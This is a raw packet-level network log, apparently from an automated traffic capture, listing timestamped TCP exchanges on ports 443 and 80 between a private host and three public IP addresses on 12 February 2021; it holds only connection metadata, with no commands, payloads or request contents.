Feb 12, 2021 18:43:18.200206041 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200212955 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.200227022 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200263023 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.200299025 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.200419903 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200442076 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200464010 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200472116 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.200484991 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.200516939 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.200555086 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201050043 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201107025 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201126099 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201129913 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201153994 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201155901 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201190948 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201209068 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201210022 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201270103 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201278925 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201303005 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201327085 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201329947 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201353073 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201373100 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201431990 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201493979 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201529980 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201556921 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201579094 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201581001 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201612949 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201634884 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201642036 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201693058 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201700926 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201723099 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201745033 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201755047 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201773882 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:18.201798916 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.201839924 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.205915928 CET	49731	443	192.168.2.3	162.241.169.26
Feb 12, 2021 18:43:18.367299080 CET	443	49731	162.241.169.26	192.168.2.3
Feb 12, 2021 18:43:21.406335115 CET	80	49729	139.162.191.228	192.168.2.3
Feb 12, 2021 18:43:21.406599998 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:00.043387890 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:00.355247021 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:00.964448929 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:02.167815924 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:04.574182034 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:09.387006998 CET	49729	80	192.168.2.3	139.162.191.228
Feb 12, 2021 18:45:12.266844034 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.267354965 CET	49750	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.341744900 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.341866970 CET	80	49750	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.341917038 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.342068911 CET	49750	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.343678951 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.463869095 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.741802931 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.741863966 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.741914988 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.741965055 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.742024899 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.742024899 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.742060900 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.742065907 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.742080927 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.742110014 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.742157936 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.781528950 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.781589031 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.781641960 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.781646013 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.781677008 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.781697035 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.781697989 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.781754017 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818383932 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818434000 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818473101 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818511963 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818526030 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818548918 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818566084 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818571091 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818576097 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818588018 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818599939 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818627119 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818650961 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818672895 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818675995 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818713903 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.818734884 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.818758011 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.821115017 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.821156979 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.821177006 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.821213007 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.825911999 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.826026917 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856625080 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856669903 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856708050 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856729984 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856756926 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856764078 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856770039 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856800079 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856806993 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856837988 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856865883 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856878042 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856899977 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856916904 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.856940985 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.856972933 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893503904 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893543959 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893567085 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893589020 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893619061 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893618107 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893642902 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893649101 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893668890 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893693924 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893697977 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893718004 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893719912 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893740892 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893754959 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893767118 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893785000 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893791914 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893801928 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893822908 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893825054 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893845081 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.893862009 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893873930 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.893913984 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.901587009 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901611090 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901628971 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901644945 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901659966 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.901660919 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901679993 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901695967 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901702881 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.901732922 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901757956 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.901762962 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.901796103 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.901834011 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.903714895 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.903784037 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.931647062 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931679010 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931704044 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931727886 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931756973 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931793928 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931817055 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931823969 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.931842089 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931863070 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.931864023 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.931869984 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.931927919 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.931957006 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.968755007 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968780994 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968792915 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968806028 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968818903 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968832016 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968843937 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968856096 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968868017 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968880892 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968897104 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968909025 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.968916893 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.968965054 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.969002008 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.977377892 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.977555990 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981369972 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981416941 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981436968 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981457949 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981472015 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981487989 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981508970 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981509924 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981528997 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981540918 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981549025 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981551886 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981554985 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981560946 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981578112 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981600046 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981615067 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981621027 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.981630087 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.981688023 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.983764887 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.983787060 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.983804941 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.983829021 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.983849049 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.983853102 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.983886957 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.983915091 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:12.986064911 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:12.986131907 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.006514072 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.006747007 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021560907 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021601915 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021637917 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021675110 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021713018 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021748066 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021785975 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021823883 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021831036 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021871090 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021872997 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021877050 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021882057 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021886110 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021891117 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021917105 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021923065 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.021960020 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.021976948 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.022003889 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.022011042 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.022058010 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.024013042 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.024060011 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.024097919 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.024097919 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.024116993 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.024135113 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.024162054 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.024174929 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.024188042 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.024224043 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.026205063 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.026343107 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.045676947 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.045830011 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061490059 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061532974 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061579943 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061621904 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061659098 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061697006 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061734915 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061736107 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061773062 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061777115 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061784029 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061789036 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061793089 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061796904 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061800957 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061813116 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061820984 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061851025 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061873913 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061899900 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061909914 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061944008 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.061954021 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.061996937 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.062431097 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.062488079 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066641092 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066693068 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066725969 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066735983 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066745043 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066773891 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066787958 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066813946 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066838026 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066853046 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.066868067 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.066904068 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.081450939 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.081584930 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102421999 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102457047 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102479935 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102502108 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102530003 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102552891 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102574110 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102607965 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102628946 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102643013 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102649927 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102673054 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102679014 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102684975 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102689028 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102693081 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102694035 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.102710009 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102730036 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.102749109 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104150057 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104228020 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104250908 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104273081 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104295015 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104301929 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104321003 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104331970 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104336977 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104343891 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104348898 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104350090 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104368925 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104372978 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104398012 CET	80	49749	35.228.31.40	192.168.2.3
Feb 12, 2021 18:45:13.104398966 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104410887 CET	49749	80	192.168.2.3	35.228.31.40
Feb 12, 2021 18:45:13.104419947 CET	80	49749	35.228.31.40	192.168.2.3
